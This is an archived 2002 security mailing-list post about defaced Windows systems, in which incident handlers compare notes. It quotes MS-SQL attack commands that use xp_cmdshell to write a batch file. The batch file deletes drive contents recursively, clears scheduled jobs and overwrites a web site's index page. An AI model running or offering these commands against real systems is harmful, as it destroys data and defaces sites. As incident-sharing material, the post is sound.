RE: Windows Systems Defaced

From: Brenna Primrose (drxlecterat_private)
Date: Fri May 03 2002 - 10:17:47 PDT

  • Next message: Johannes B. Ullrich: "RE: Windows Systems Defaced"

    I saw SQL probes today on several of our systems from --
    coincidence?  I think not. is infamous for looking for FTP
    servers to crack.  Hmmm...
    AIM - abosolut x psycho
    Yahoo! - absolut_contagion
    ICQ - 1363187
    Version: 3.12
    GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
    O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
    G e* h- r++ x+ 
    ------END GEEK CODE BLOCK------
    -----Original Message-----
    From: Steve Zenone [mailto:zenoneat_private] 
    Sent: Thursday, May 02, 2002 10:24 PM
    To: incidentsat_private
    Cc: thompsonat_private
    Subject: RE: Windows Systems Defaced
    Stephen W. Thompson wrote:
    |> Have any of you seen similar activity? Any thoughts?
    |Yes, we had one that matches most of your details.  These
    |are exact matches:
    |>  [] Damage occurred around 1600 on 5/1/2002
    |BUT=>   (approx. 16:00 EDT for us)
    |>  [] Win-popup message with "F---ing University of Rochester"
    |>       -- NOTE: not all systems running IIS
    |>  [] Admins claimed that all systems were patched correctly
    |>  [] Most were running updated and current AV
    Thank you very much for your reply - it definitely helps!
    We have been seeing MS-SQL (1433/tcp) attacks that try and execute 
    the following: 
    -----BEGIN SNIPPET-----
        xp_cmdshell 'echo net send localhost F---ing University of Rochester
    rebooting... > rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
        xp_cmdshell 'at /delete /y'
        xp_cmdshell 'echo if exist \inetpub\wwwroot\ type 
    %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> 
    -----END SNIPPET-----
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:

    This archive was generated by hypermail 2b30 : Fri May 03 2002 - 11:42:50 PDT